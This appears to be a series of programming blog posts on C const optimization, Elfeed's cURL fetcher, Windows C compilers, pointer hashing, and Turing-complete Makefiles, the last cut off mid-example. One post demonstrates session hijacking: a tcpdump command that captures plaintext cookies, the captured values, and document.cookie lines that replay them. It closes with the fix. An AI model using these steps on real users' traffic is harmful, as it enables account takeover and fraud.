
Const and Optimization in C

Today there was a question on /r/C_Programming about the effect of C’s const on optimization. Variations of this question have been asked many times over the past two decades. Personally, I blame the naming of const.

Given this program:

void foo(const int *);

int
bar(void)
{
    int x = 0;
    int y = 0;
    for (int i = 0; i < 10; i++) {
        foo(&x);
        y += x;  // this load not optimized out
    }
    return y;
}

The function foo takes a pointer to const, which is a promise from the author of foo that it won’t modify the value of x. Given this information, it would seem the compiler may assume x is always zero, and therefore y is always zero.

However, inspecting the assembly output of several different compilers shows that x is loaded each time around the loop. Here’s gcc 4.9.2 at -O3, with annotations.

     push   rbp
     push   rbx
     xor    ebp, ebp              ; y = 0
     mov    ebx, 0xa              ; loop variable i
     sub    rsp, 0x18             ; allocate x
     mov    dword [rsp+0xc], 0    ; x = 0

.L0: lea    rdi, [rsp+0xc]        ; compute &x
     call   foo
     add    ebp, dword [rsp+0xc]  ; y += x  (not optimized?)
     sub    ebx, 1
     jne    .L0

     add    rsp, 0x18             ; deallocate x
     mov    eax, ebp              ; return y
     pop    rbx
     pop    rbp

The output of clang 3.5 (with -fno-unroll-loops) is the same, except ebp and ebx are swapped, and the computation of &x is hoisted out of the loop, into r14.

Are both compilers failing to take advantage of this useful information? Wouldn’t it be undefined behavior for foo to modify x? Surprisingly, the answer is no. In this situation, this would be a perfectly legal definition of foo.

void
foo(const int *readonly_x)
{
    int *x = (int *)readonly_x;  // cast away const
    (*x)++;
}

The key thing to remember is that const doesn’t mean constant. Chalk it up as a misnomer. It’s not an optimization tool. It’s there to inform programmers — not the compiler — as a tool to catch a certain class of mistakes at compile time. I like it in APIs because it communicates how a function will use certain arguments, or how the caller is expected to handle returned pointers. It’s usually not strong enough for the compiler to change its behavior.

Despite what I just said, occasionally the compiler can take advantage of const for optimization. The C99 specification, in §6.7.3¶5, has one sentence just for this:

If an attempt is made to modify an object defined with a const-qualified type through use of an lvalue with non-const-qualified type, the behavior is undefined.

The original x wasn’t const-qualified, so this rule didn’t apply. And there aren’t any rules against casting away const to modify an object that isn’t itself const. This means the above (mis)behavior of foo isn’t undefined behavior for this call. Notice how the undefined-ness of foo depends on how it was called.

With one tiny tweak to bar, I can make this rule apply, allowing the optimizer to do some work on it.

    const int x = 0;

The compiler may now assume that foo modifying x is undefined behavior, therefore it never happens. For better or worse, this is a major part of how a C optimizer reasons about your programs. The compiler is free to assume x never changes, allowing it to optimize out both the per-iteration load and y.

     push   rbx
     mov    ebx, 0xa            ; loop variable i
     sub    rsp, 0x10           ; allocate x
     mov    dword [rsp+0xc], 0  ; x = 0

.L0: lea    rdi, [rsp+0xc]      ; compute &x
     call   foo
     sub    ebx, 1
     jne    .L0

     add    rsp, 0x10           ; deallocate x
     xor    eax, eax            ; return 0
     pop    rbx

The load disappears, y is gone, and the function always returns zero.

Curiously, the specification allows the compiler to go even further. It’s permitted to allocate x somewhere off the stack, even in read-only memory. For example, it could perform a transformation like this:

static const int __x = 0;

int
bar(void)
{
    for (int i = 0; i < 10; i++)
        foo(&__x);
    return 0;
}

Or on x86-64 (-fPIC, small code model), where we can see a few more instructions shaved off:

section .rodata
x:   dd     0

section .text
     push   rbx
     mov    ebx, 0xa        ; loop variable i

.L0: lea    rdi, [rel x]    ; compute &x
     call   foo
     sub    ebx, 1
     jne    .L0

     xor    eax, eax        ; return 0
     pop    rbx

Neither clang nor gcc took it this far, perhaps because it’s more disruptive to badly-behaved programs.

Even with this special const rule, only use const for yourself and for your fellow human programmers. Let the optimizer reason for itself about what is constant and what is not.

tags: [ c x86 ]

Stealing Session Cookies with Tcpdump

My wife was shopping online for running shoes when she got this classic Firefox pop-up.

These days this is usually just a server misconfiguration annoyance. However, she was logged into an account, which included a virtual shopping cart and associated credit card payment options, meaning actual sensitive information would be at risk.

The main culprit was the website’s search feature, which wasn’t transmitted over HTTPS. There’s an HTTPS version of the search (which I found manually), but searches aren’t directed there. This means it’s also vulnerable to SSL stripping.

Fortunately Firefox warns about the issue and requires a positive response before continuing. Neither Chrome nor Internet Explorer gets this right. Both transmit session cookies in the clear without warning, then subtly mention it after the fact. She may not have even noticed the problem (and then asked me about it) if not for that pop-up.

I contacted the website’s technical support two weeks ago and they never responded, nor did they fix any of their issues, so for now you can see this all for yourself.

Finding the session cookies

To prove to myself that this whole situation was really as bad as it looked, I decided to steal her session cookie and use it to manipulate her shopping cart. First I hit F12 in her browser to peek at the network headers. Perhaps nothing important was actually sent in the clear.

The session cookie (red box) was definitely sent in the request. I only need to catch it on the network. That’s an easy job for tcpdump.

tcpdump -A -l dst <addr> and dst port 80 | \
    grep "^Cookie: "

This command tells tcpdump to dump selected packet content as ASCII (-A). It also sets output to line-buffered so that I can see packets as soon as they arrive (-l). The filter will only match packets going out to this website and only on port 80 (HTTP), so I won’t see any extraneous noise (dst <addr> and dst port <port>). Finally, I crudely run that all through grep to see if any cookies fall out.

On the next insecure page load I get this (wrapped here for display) spilling many times into my terminal:

Cookie: JSESSIONID=99004F61A4ED162641DC36046AC81EAB.prd_rrs12; visitSo
  urce=Registered; RoadRunnerTestCookie=true; mobify-path=; __cy_d=09A
  78CC1-AF18-40BC-8752-B2372492EDE5; _cybskt=; _cycurrln=; wpCart=0; _
  up=1.2.387590744.1465699388; __distillery=a859d68_771ff435-d359-489a
  -bf1a-1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c; DYN_USER_ID=16328657
  52; DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4

That’s a bingo! I massage this into a bit of JavaScript, go to the store page in my own browser, and dump it in the developer console. I don’t know which cookies are important, but that doesn’t matter. I take them all.

document.cookie = "JSESSIONID=99004F61A4ED162641DC36046AC81EAB.prd_rrs12";
document.cookie = "visitSource=Registered";
document.cookie = "RoadRunnerTestCookie=true";
document.cookie = "mobify-path=";
document.cookie = "__cy_d=09A78CC1-AF18-40BC-8752-B2372492EDE5";
document.cookie = "_cybskt=";
document.cookie = "_cycurrln=";
document.cookie = "wpCart=0";
document.cookie = "_up=1.2.387590744.1465699388";
document.cookie = "__distillery=a859d68_771ff435-d359-489a-bf1a-" +
                  "1e3dba9b8c10-db57323d1-79769fcf5b1b-fc6c";
document.cookie = "DYN_USER_ID=1632865752";
document.cookie = "DYN_USER_CONFIRM=575360a28413d508246fae6befe0e1f4";

Refresh the page and now I’m logged in. I can see what’s in the shopping cart. I can add and remove items. I can checkout and complete the order. My browser is as genuine as hers.

How to fix it

The quick and dirty thing to do is set the Secure and HttpOnly flags on all cookies. The first prevents cookies from being sent in the clear, where a passive observer might see them. The second prevents JavaScript from accessing them, since an active attacker could inject their own JavaScript into the page. Customers would appear to be logged out on plain HTTP pages, which is confusing.
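A sketch of what the fix looks like in the response headers (cookie value taken from the capture above; the flag syntax is standard HTTP state management):

```http
HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=99004F61A4ED162641DC36046AC81EAB.prd_rrs12; Secure; HttpOnly
```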

However, since this is an online store, there’s absolutely no excuse to be serving anything over plain HTTP. This just opens customers up to downgrade attacks. The long term solution, in addition to the cookie flags above, is to redirect all HTTP requests to HTTPS and never serve or request content over HTTP, especially not executable content like JavaScript.

tags: [ ]

Elfeed, cURL, and You

This morning I pushed out an important update to Elfeed, my web feed reader for Emacs. The update should be available in MELPA by the time you read this. Elfeed now has support for fetching feeds using cURL through a curl inferior process. You’ll need the program in your PATH or configured through elfeed-curl-program-name.

I’ve been using it for a couple of days now, but, while I work out the remaining kinks, it’s disabled by default. So in addition to having cURL installed, you’ll need to set elfeed-use-curl to non-nil. Sometime soon it will be enabled by default whenever cURL is available. The original url-retrieve fetcher will remain in place for the time being. However, cURL may become a requirement someday.

Fetching with a curl inferior process has some huge advantages.

It’s much faster

The most obvious change is that you should experience a huge speedup on updates and better responsiveness during updates after the first cURL run. There are two important reasons:

Asynchronous DNS and TCP: Emacs 24 and earlier performs DNS queries synchronously even for asynchronous network processes. This is being fixed on some platforms (including Linux) in Emacs 25, but now we don’t have to wait.

On Windows it’s even worse: the TCP connection is also established synchronously. This is especially bad when fetching relatively small items such as feeds, because the DNS look-up and TCP handshake dominate the overall fetch time. It essentially makes the whole process synchronous.

Conditional GET: HTTP has two mechanisms to avoid transmitting information that a client has previously fetched. One is the Last-Modified header delivered by the server with the content. When querying again later, the client echoes the date back like a token in the If-Modified-Since header.

The second is the “entity tag,” an arbitrary server-selected token associated with each version of the content. The server delivers it along with the content in the ETag header, and the client hands it back later in the If-None-Match header, sort of like a cookie.

This is highly valuable for feeds because, unless the feed is particularly active, most of the time the feed hasn’t been updated since the last query. This avoids sending anything other than a handful of headers each way. In Elfeed’s case, it means it doesn’t have to parse the same XML over and over again.
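Putting both mechanisms together, a typical revalidation round trip looks something like this (the header values are illustrative, not from a real server):

```http
GET /feed.xml HTTP/1.1
Host: example.com
If-Modified-Since: Mon, 13 Jun 2016 08:00:00 GMT
If-None-Match: "1e8f-5351373b6c180"

HTTP/1.1 304 Not Modified
Last-Modified: Mon, 13 Jun 2016 08:00:00 GMT
ETag: "1e8f-5351373b6c180"
```

A 304 response has no body, so nothing but a few headers crosses the wire.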

Both of these being outside of cURL’s scope, Elfeed has to manage conditional GET itself. I had no control over the HTTP headers until now, so I couldn’t take advantage of it. Emacs’ url-retrieve function allows for sending custom headers through dynamically binding url-request-extra-headers, but this isn’t available when calling url-queue-retrieve since the request itself is created asynchronously.

Both the ETag and Last-Modified values are stored in the database and persist across sessions. This is the reason the full speedup isn’t realized until the second fetch. The initial cURL fetch doesn’t have these values.

Fewer bugs

As mentioned previously, Emacs has a built-in URL retrieval library called url. The central function is url-retrieve which asynchronously fetches the content at an arbitrary URL (usually HTTP) and delivers the buffer and status to a callback when it’s ready. There’s also a queue front-end for it, url-queue-retrieve which limits the number of parallel connections. Elfeed hands this function a pile of feed URLs all at once and it fetches them N at a time.

Unfortunately both these functions are incredibly buggy. It’s been a thorn in my side for years.

Here’s what the interface looks like for both:

(url-retrieve URL CALLBACK &optional CBARGS SILENT INHIBIT-COOKIES)
It takes a URL and a callback. Seeing this, the sane, unsurprising expectation is that the callback will be invoked exactly once for each time url-retrieve was called. In any case where the request fails, it should report the failure through the callback. This is not the case. The callback may be invoked any number of times, including zero.

In this example, suppose you have a webserver on port 8080 that will return an HTTP 404 at the given URL. Below, I fire off 10 asynchronous requests in a row.

(defvar results ())
(dotimes (i 10)
  (url-retrieve "http://localhost:8080/404"
                (lambda (status) (push (cons i status) results))))

What would you guess is the length of results? It’s initially 0 before any requests complete and over time (a very short time) I would expect this to top out at 10. On Emacs 24, here’s the real answer:

(length results)
;; => 46

The same error is reported multiple times to the callback. At least the pattern is obvious.

(cl-count 0 results :key #'car)
;; => 9
(cl-count 1 results :key #'car)
;; => 8
(cl-count 2 results :key #'car)
;; => 7

(cl-count 9 results :key #'car)
;; => 1

Here’s another one, this time to the non-existent foo.example. The DNS query should never resolve.

(setf results ())
(dotimes (i 10)
  (url-retrieve "http://foo.example/"
                (lambda (status) (push (cons i status) results))))

What’s the length of results? This time it’s zero. Remember how DNS is synchronous? Because of this, DNS failures are reported synchronously as a signaled error. This gets a lot worse with url-queue-retrieve. Since the request is put off until later, DNS doesn’t fail until later, and you get neither a callback nor an error signal. This also puts the queue in a bad state and necessitated elfeed-unjam to manually clear it. This one should get fixed in Emacs 25 when DNS is asynchronous.

This last one assumes you don’t have anything listening on port 57432 (pulled out of nowhere) so that the connection fails.

(setf results ())
(dotimes (i 10)
  (url-retrieve "http://127.0.0.1:57432/"
                (lambda (status) (push (cons i status) results))))

On Linux, we finally get the sane result of 10. However, on Windows, it’s zero. The synchronous TCP connection will fail, signaling an error just like DNS failures. Not only is it broken, it’s broken in different ways on different platforms.

There are many more cases of callback weirdness which depend on the connection and HTTP session being in various states when things go awry. These were just the easiest to demonstrate. By using cURL, I get to bypass this mess.

No more GnuTLS issues

At compile time, Emacs can optionally be linked against GnuTLS, giving it robust TLS support so long as the shared library is available. url-retrieve uses this for fetching HTTPS content. Unfortunately, this library is noisy and will occasionally echo non-informational messages in the minibuffer and in *Messages* that cannot be suppressed.

When not linked against GnuTLS, Emacs will instead run the GnuTLS command line program as an inferior process, just like Elfeed now does with cURL. Unfortunately this interface is very slow and frequently fails, basically preventing Elfeed from fetching HTTPS feeds. I suspect it’s in part due to an improper coding-system-for-read.

cURL handles all the TLS negotiation itself, so both these problems disappear. The compile-time configuration doesn’t matter.

Windows is now supported

Emacs’ Windows networking code is so unstable, even in Emacs 25, that I couldn’t make any practical use of Elfeed on that platform. Even the Cygwin emacs-w32 version couldn’t cut it. It hard crashes Emacs every time I’ve tried to fetch feeds. Fortunately the inferior process code is a whole lot more stable, meaning fetching with cURL works great. As of today, you can now use Elfeed on Windows. The biggest obstacle is getting cURL installed and configured.

Interface changes

With cURL, obviously the values of url-queue-timeout and url-queue-parallel-processes no longer have any meaning to Elfeed. If you set these for yourself, you should instead call the functions elfeed-set-timeout and elfeed-set-max-connections, which will do the appropriate thing depending on the value of elfeed-use-curl. Each also comes with a getter so you can query the current value.

The deprecated elfeed-max-connections has been removed.

Feed objects now have meta tags :etag, :last-modified, and :canonical-url. The latter can identify feeds that have been moved, though it needs a real UI.

See any bugs?

If you use Elfeed, grab the current update and give the cURL fetcher a shot. Please open a ticket if you find problems. Be sure to report your Emacs version, operating system, and cURL version.

As of this writing there’s just one thing missing compared to url-queue: connection reuse. cURL supports it, so I just need to code it up.

tags: [ emacs elfeed ]

Four Ways to Compile C for Windows

I primarily work on and develop for unix-like operating systems — Linux in particular. However, when it comes to desktop applications, most potential users are on Windows. Rather than develop on Windows, which I’d rather avoid, I’ll continue developing, testing, and debugging on Linux while keeping portability in mind. Unfortunately every option I’ve found for building Windows C programs has some significant limitations. These limitations advise my approach to portability and restrict the C language features used by the program for all platforms.

As of this writing I’ve identified four different practical ways to build C applications for Windows. This information will definitely become further and further out of date as this article ages, so if you’re visiting from the future take a moment to look at the date. Except for LLVM shaking things up recently, development tooling on unix-like systems has had the same basic form for the past 15 years (i.e. dominated by GCC). While Visual C++ has been around for more than two decades, the tooling on Windows has seen more churn by comparison.

Before I get into the specifics, let me point out a glaring problem common to all four: Unicode arguments and filenames. Microsoft jumped the gun and adopted UTF-16 early. UTF-16 is a kludge, a worst of all worlds, being a variable length encoding (surrogate pairs), backwards incompatible (unlike UTF-8), and having byte-order issues (BOM). Most Win32 functions that accept strings generally come in two flavors, ANSI and UTF-16. The standard, portable C library functions wrap the ANSI-flavored functions. This means portable C programs can’t interact with Unicode filenames. They must call the non-portable, Windows-specific versions. This includes main itself, which is only handed ANSI-truncated arguments.

Compare this to unix-like systems, which generally adopted UTF-8, though as a convention rather than a hard rule. The operating system doesn’t know or care about Unicode. Program arguments and filenames are just zero-terminated bytestrings. Implicitly decoding these as UTF-8 would be a mistake anyway. What happens when the encoding isn’t valid?

This doesn’t have to be a problem on Windows. A Windows standard C library could connect to Windows’ Unicode-flavored functions and encode to/from UTF-8 as needed, allowing portable programs to maintain the bytestring illusion. It’s only that none of the existing standard C libraries do it this way.

Mingw-w64

Of course my first natural choice is MinGW, specifically the Mingw-w64 fork. It’s GCC ported to Windows. You can continue relying on GCC-specific features when you need them. It’s got all the core language features up through C11, plus the common extensions. It’s probably packaged by your Linux distribution of choice, making it trivial to cross-compile programs and libraries from Linux — and with Wine you can even execute them on x86. Like regular GCC, it outputs GDB-friendly DWARF debugging information, so you can debug applications with GDB (my favorite).

If I’m using Mingw-w64 on Windows, I prefer to do so from inside Cygwin. Since it provides a complete POSIX environment, it maximizes portability for the whole tool chain. This isn’t strictly required.

However, it has one big flaw. Unlike unix-like systems, Windows doesn’t supply a system standard C library. That’s the compiler’s job. But Mingw-w64 doesn’t have one. Instead it links against msvcrt.dll, which isn’t officially supported by Microsoft. It just happens to exist on modern Windows installations. Since it’s not supported, it’s way out of date and doesn’t support much of C99, let alone C11. A lot of these problems are patched over by the compiler, but if you’re relying on Mingw-w64, you still have to stick to some C89 library features, such as limiting yourself to the C89 printf specifiers.

Update: Mārtiņš Možeiko has pointed out __USE_MINGW_ANSI_STDIO, an undocumented feature that fixes the printf family.

Visual C++

The behemoth usually considered in this situation is Visual Studio and the Visual C++ build tools. I strongly prefer open source development tools, and Visual Studio is obviously the least open source option, but at least it’s cost-free these days. Now, I have absolutely no interest in Visual Studio, but fortunately the Visual C++ compiler and associated build tools can be used standalone, supporting both C and C++.

Included is a “vcvars” batch file — vcvars64.bat for x64. Execute that batch file in a cmd.exe console and the Visual C++ command line build tools will be made available in that console and in any programs executed from it (your editor). It includes the compiler (cl.exe), linker (link.exe), assembler (ml64.exe), disassembler (dumpbin.exe), and more. It also includes a mostly POSIX-complete make called nmake.exe. All these tools are noisy and print a copyright banner on every invocation, so get used to passing -nologo every time, which suppresses some of it.

When I said behemoth, I meant it. In my experience it literally takes hours (unattended) to install Visual Studio 2015. The good news is you don’t actually need it all anymore. The build tools are available standalone. While it’s still a larger and slower installation process than it really should be, it’s much more reasonable to install. It’s good enough that I’d even say I’m comfortable relying on it for Windows builds.

That being said, it’s not without its flaws. Microsoft has never announced any plans to support C99. They only care about C++, with C as a second class citizen. Since C++11 incorporated most of C99 and Microsoft supports C++11, Visual Studio 2015 very nearly supports all of C99, even more than Mingw-w64. The only things missing as far as I can tell are variable length arrays (VLAs), complex numbers, and C99’s array parameter declarators, since none of these were adopted by C++. Some C99 features are considered extensions (as they would be for C89), so you’ll also get warnings about them, which can be disabled.

The command line interface (option flags, intermediates, etc.) isn’t quite reconcilable with the unix-like ecosystem (i.e. GCC, Clang), so you’ll need separate Makefiles, or you’ll need to use a build system that generates Visual C++ Makefiles.

Debugging is a major problem. Visual C++ outputs separate .pdb program database files, which aren’t usable from GDB. Visual Studio has a built-in debugger, though it’s not included in the standalone Visual C++ build tools. I’m still searching for a decent debugging solution for this scenario. I tried WinDbg, but I can’t stand it.

In general the output code performance is on par with GCC and Clang, so you’re not really gaining or losing performance with Visual C++.

Clang

Unsurprisingly, Clang has been ported to Windows. It’s like Mingw-w64 in that you get the same features and interface across platforms.

Unlike Mingw-w64, it doesn’t link against msvcrt.dll. Instead it relies directly on the official Windows SDK. You’ll basically need to install the Visual C++ build tools as if you were going to build with Visual C++. This means no practical cross-platform builds and you’re still relying on the proprietary Microsoft toolchain. In the past you even had to use Microsoft’s linker, but LLVM now provides its own.

It generates GDB-friendly DWARF debug information (in addition to CodeView) so in theory you can debug with GDB again. I haven’t given this a thorough evaluation yet.

Pelles C

Finally there’s Pelles C. It’s cost-free but not open source. It’s a reasonable, small install that includes a full IDE with an integrated debugger and command line tools. It has its own C library and Win32 SDK with the most complete C11 support around. It also supports OpenMP 3.1. All in all it’s pretty nice and is something I wouldn’t be afraid to rely upon for Windows builds.

Like Visual C++, it has a couple of “povars” batch files to set up the right environment, which includes a C compiler, linker, assembler, etc. The compiler interface mostly mimics cl.exe, though there are far fewer code generation options. The make program, pomake.exe, mimics nmake.exe, but is even less POSIX-complete. The compiler’s output code performance is also noticeably poorer than GCC, Clang, and Visual C++. It’s definitely a less mature compiler.

It outputs CodeView debugging information, so GDB is of no use. The best solution is to simply use the debugger built into the IDE, which can be invoked directly from the command line. You don’t need to code from within the IDE just to use its debugger.

Like Visual C++, it’s Windows only, so cross-compilation isn’t really in the picture.

If performance isn’t of high importance, and you don’t require specific code generation options, then Pelles C is a nice choice for Windows builds.

Other Options

I’m sure there are a few other options out there, and I’d like to hear about them so I can try them out. I focused on these since they’re all cost free and easy to download. If I have to register or pay, then it’s not going to beat these options.

tags: [ c cpp win32 ]

You Can't Always Hash Pointers in C

Occasionally I’ve needed to key a hash table with C pointers. I don’t care about the contents of the object itself — especially if it might change — just its pointer identity. For example, suppose I’m using null-terminated strings as keys and I know these strings will always be interned in a common table. These strings can be compared directly by their pointer values (str_a == str_b) rather than, more slowly, by their contents (strcmp(str_a, str_b) == 0). The intern table ensures that these expressions both have the same result.

As a key in a hash table, or other efficient map/dictionary data structure, I’ll need to turn pointers into numerical values. However, C pointers aren’t integers. Following certain rules it’s permitted to cast pointers to integers and back, but doing so will reduce the program’s portability. The most important consideration is that the integer form isn’t guaranteed to have any meaningful or stable value. In other words, even in a conforming implementation, the same pointer might cast to two different integer values. This would break any algorithm that isn’t keenly aware of the implementation details.

To show why this is, I’m going to be citing the relevant parts of the C99 standard (ISO/IEC 9899:1999). The draft for C99 is freely available (and what I use myself since I’m a cheapass). My purpose is not to discourage you from casting pointers to integers and using the result. The vast majority of the time this works fine and as you would expect. I just think it’s an interesting part of the language, and C/C++ programmers should be aware of the potential trade-offs.

Integer to pointer casts

What does the standard have to say about casting integers to pointers? §¶5:

An integer may be converted to any pointer type. Except as previously specified, the result is implementation-defined, might not be correctly aligned, might not point to an entity of the referenced type, and might be a trap representation.

It also includes a footnote:

The mapping functions for converting a pointer to an integer or an integer to a pointer are intended to be consistent with the addressing structure of the execution environment.

Casting an integer to a pointer depends entirely on the implementation. This is intended for things like memory mapped hardware. The programmer may need to access memory as a specific physical address, which would be encoded in the source as an integer constant and cast to a pointer of the appropriate type.

    return *(int *)0x1ffc;

It may also be used by a loader and dynamic linker to compute the virtual address of various functions and variables, then cast to a pointer before use.

Both cases are already dependent on implementation defined behavior, so there’s nothing lost in relying on these casts.

An integer constant expression of 0 is a special case. It casts to a NULL pointer in all implementations (§¶3). However, a NULL pointer doesn’t necessarily point to address zero, nor is it necessarily a zero bit pattern (i.e. beware memset and calloc on memory with pointers). It’s just guaranteed never to compare equally with a valid object, and it is undefined behavior to dereference.

Pointer to integer casts

What about the other way around? §¶6:

Any pointer type may be converted to an integer type. Except as previously specified, the result is implementation-defined. If the result cannot be represented in the integer type, the behavior is undefined. The result need not be in the range of values of any integer type.

Like before, it’s implementation defined. However, the negatives are a little stronger: the cast itself may be undefined behavior. I speculate this is tied to integer overflow. The last part makes pointer to integer casts optional for an implementation. This is one way that a pointer-keyed hash table would be less portable.

When the cast is always possible, an implementation can provide an integer type wide enough to hold any pointer value. §7.18.1.4¶1:

The following type designates a signed integer type with the property that any valid pointer to void can be converted to this type, then converted back to pointer to void, and the result will compare equal to the original pointer:

intptr_t

The following type designates an unsigned integer type with the property that any valid pointer to void can be converted to this type, then converted back to pointer to void, and the result will compare equal to the original pointer:

uintptr_t

These types are optional.

The take-away is that the integer has no meaningful value. The only guarantee is that the integer can be cast back into a void pointer that will compare equally. It would be perfectly legal for an implementation to pass these assertions (and still sometimes fail).

void
example(void *ptr_a, void *ptr_b)
{
    if (ptr_a == ptr_b) {
        uintptr_t int_a = (uintptr_t)ptr_a;
        uintptr_t int_b = (uintptr_t)ptr_b;
        assert(int_a != int_b);
        assert((void *)int_a == (void *)int_b);
    }
}
Since the bits don’t have any particular meaning, arithmetic operations involving them will also have no meaning. When a pointer might map to two different integers, the hash values might not match up, breaking hash tables that rely on them. Even with uintptr_t provided, casting pointers to integers isn’t useful without also relying on implementation defined properties of the result.

Reasons for this pointer insanity

What purpose could such strange pointer-to-integer casts serve?

A security-conscious implementation may choose to annotate pointers with additional information by setting unused bits. It might be for baggy bounds checks or, someday, in an undefined behavior sanitizer. Before dereferencing annotated pointers, the metadata bits would be checked for validity, and cleared/set before use as an address. Or it may map the same object at multiple virtual addresses to avoid setting/clearing the metadata bits, providing interoperability with code unaware of the annotations. When pointers are compared, these bits would be ignored.

When these annotated pointers are cast to integers, the metadata bits will be present, but a program using the integer wouldn’t know their meaning without tying itself closely to that implementation. Completely unused bits may even be filled with random garbage when cast. It’s allowed.

You may be thinking of using a union or char * to bypass the cast and access the raw pointer bytes directly, but you'd run into the same problems on the same implementations.

Conforming programs

The standard makes a distinction between strictly conforming programs (§4¶5) and conforming programs (§4¶7). A strictly conforming program must not produce output depending on implementation defined behavior nor exceed minimum implementation limits. Very few programs fit in this category, and no program using uintptr_t does, since the type itself is optional. Here are more examples of code that isn't strictly conforming:

    printf("%zu", sizeof(int)); // §
    printf("%d", -1 >> 1);      // §6.5¶4
    printf("%d", INT_MAX);      // §

On the other hand, a conforming program is allowed to depend on implementation defined behavior. Relying on meaningful, stable values for pointers cast to uintptr_t/intptr_t is conforming even if your program may exhibit bugs on some implementations.

tags: [ c cpp ]

Makefile Assignments are Turing-Complete

For over a decade now, GNU Make has almost exclusively been my build system of choice, either directly or indirectly. Unfortunately this means I unnecessarily depend on some GNU extensions — an annoyance when porting to the BSDs. In an effort to increase the portability of my Makefiles, I recently read the POSIX make specification. I learned two important things: 1) POSIX make is so barren it’s not really worth striving for, and 2) make’s macro assignment mechanism is Turing-complete.

If you want to see it in action for yourself before reading further, here’s a Makefile that implements Conway’s Game of Life (40x40) using only macro assignments.

Run it with any make program in an ANSI terminal. It must literally be named life.mak. Beware: if you run it longer than a few minutes, your computer may begin thrashing.

make -f life.mak

It’s 100% POSIX-compatible except for the sleep 0.1 (fractional sleep), which is only needed for visual effect.

A POSIX workaround

Unlike virtually every real world implementation, POSIX make doesn’t support conditional parts. For example, you might want your Makefile’s behavior to change depending on the value of certain variables. In GNU Make it looks like this:

ifdef USE_FOO
    EXTRA_FLAGS = -ffoo -lfoo
else
    EXTRA_FLAGS = -Wbar
endif

Or BSD-style:

.ifdef USE_FOO
    EXTRA_FLAGS = -ffoo -lfoo
.else
    EXTRA_FLAGS = -Wbar
.endif

If the goal is to write a strictly POSIX Makefile, how could I work around the lack of conditional parts and maintain a similar interface? The macro/variable to evaluate can be selected dynamically, allowing for some useful tricks. First define the option's default:

USE_FOO = 0
Then define both sets of flags:

EXTRA_FLAGS_0 = -Wbar
EXTRA_FLAGS_1 = -ffoo -lfoo

Now dynamically select one of these macros for assignment to EXTRA_FLAGS.

EXTRA_FLAGS = $(EXTRA_FLAGS_$(USE_FOO))
The assignment on the command line overrides the assignment in the Makefile, so the user gets to override USE_FOO.

$ make              # EXTRA_FLAGS = -Wbar
$ make USE_FOO=0    # EXTRA_FLAGS = -Wbar
$ make USE_FOO=1    # EXTRA_FLAGS = -ffoo -lfoo

Before reading the POSIX specification, I didn't realize that the left side of an assignment can get the same treatment. If I really want the "if defined" behavior back, I can use the macro to mangle the left-hand side:

EXTRA_FLAGS         = -O0 -g3
EXTRA_FLAGS$(DEBUG) = -O3 -DNDEBUG
Caveat: If DEBUG is set to empty, it may still result in true for ifdef depending on which make flavor you’re using, but will always appear to be unset in this hack.

$ make             # EXTRA_FLAGS = -O3 -DNDEBUG
$ make DEBUG=yes   # EXTRA_FLAGS = -O0 -g3

This last case had me thinking: This is very similar to the (ab)use of the x86 mov instruction in mov is Turing-complete. These macro assignments alone should be enough to compute any algorithm.

Macro Operations

Macro names are just keys to a global associative array. This can be used to build lookup tables. Here’s a Makefile to “compute” the square root of integers between 0 and 10.

sqrt_0  = 0.000000
sqrt_1  = 1.000000
sqrt_2  = 1.414214
sqrt_3  = 1.732051
sqrt_4  = 2.000000
sqrt_5  = 2.236068
sqrt_6  = 2.449490
sqrt_7  = 2.645751
sqrt_8  = 2.828427
sqrt_9  = 3.000000
sqrt_10 = 3.162278
result := $(sqrt_$(n))

The BSD flavors of make have a -V option for printing variables, which is an easy way to retrieve output. I used an “immediate” assignment (:=) for result since some versions of make won’t evaluate the expression before -V printing.

$ make -f sqrt.mak -V result n=8

Without -V, a default target could be used instead:

output :
        @printf "$(result)\n"

There are no math operators, so performing arithmetic requires some creativity. For example, integers could be represented as a series of x characters. The number 4 is xxxx, the number 6 is xxxxxx, etc. Addition is concatenation (note: macros can have + in their names):

A      = xxx
B      = xxxx
A+B    = $(A)$(B)

However, since there’s no way to “slice” a value, subtraction isn’t possible. A more realistic approach to arithmetic would require lookup tables.
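A sketch of what such a table might look like — the add_ macro names here are my own, purely for illustration:

```make
# Hypothetical addition table: add_<a>_<b> holds a+b.
# Every needed pair of operands must be enumerated.
add_0_0 = 0
add_0_1 = 1
add_1_0 = 1
add_1_1 = 2
add_2_3 = 5
# ...
sum := $(add_$(a)_$(b))
```

With BSD make, `make -f add.mak -V sum a=2 b=3` would print 5 (assuming the file is named add.mak).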


Branching could be achieved through more lookup tables. For example,

square_0  = 0
square_1  = 1
square_2  = 4
# ...
result := $($(op)_$(n))

And called as:

$ make n=5 op=sqrt    # 2.236068
$ make n=5 op=square  # 25

Or using the DEBUG trick above, use the condition to mask out the results of the unwanted branch. This is similar to the mov paper.

result           := $(op)($(n)) = $($(op)_$(n))
result$(verbose) := $($(op)_$(n))

And its usage:

$ make n=5 op=square             # 25
$ make n=5 op=square verbose=1   # square(5) = 25

What about loops?

Looping is a tricky problem. However, one of the most common build (anti?)patterns is the recursive Makefile. Borrowing from the mov paper, which used an unconditional jump to restart the program from the beginning, I can invoke the Makefile recursively, restarting the program with a new set of inputs.

Remember the output target above? I can loop by invoking make again with new inputs in this target,

output :
    @printf "$(result)\n"
    @$(MAKE) $(args)

Before going any further, now that loops have been added, the natural next question is halting. In reality, the operating system will take care of that after some millions of make processes have carelessly been invoked by this horribly inefficient scheme. However, we can do better. The program can clobber the MAKE variable when it’s ready to halt. Let’s formalize it.

loop = $(MAKE) $(args)
output :
    @printf "$(result)\n"
    @$(loop)

To halt, the program just needs to clear loop.

Suppose we want to count down to 0. There will be an initial count:

count = 6

A decrement table:

6  = 5
5  = 4
4  = 3
3  = 2
2  = 1
1  = 0
0  = loop

The last line will be used to halt: when count reaches 1, the assignment below clears the macro named on its right side (loop). This is three star territory.

$($($(count))) =

The result (the value for the current iteration) is computed from the lookup table.

result = $($(count))

The next loop value is passed via args. If loop was cleared above, this result will be discarded.

args = count=$(result)

With all that in place, invoking the Makefile will print a countdown from 5 to 0 and quit. This is the general structure for the Game of Life macro program.
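Assembled from the pieces above into one Makefile, the countdown looks like this (recipe lines must be indented with tabs):

```make
count = 6

# decrement table
6 = 5
5 = 4
4 = 3
3 = 2
2 = 1
1 = 0
0 = loop

# when count reaches 1, this clears "loop", halting the recursion;
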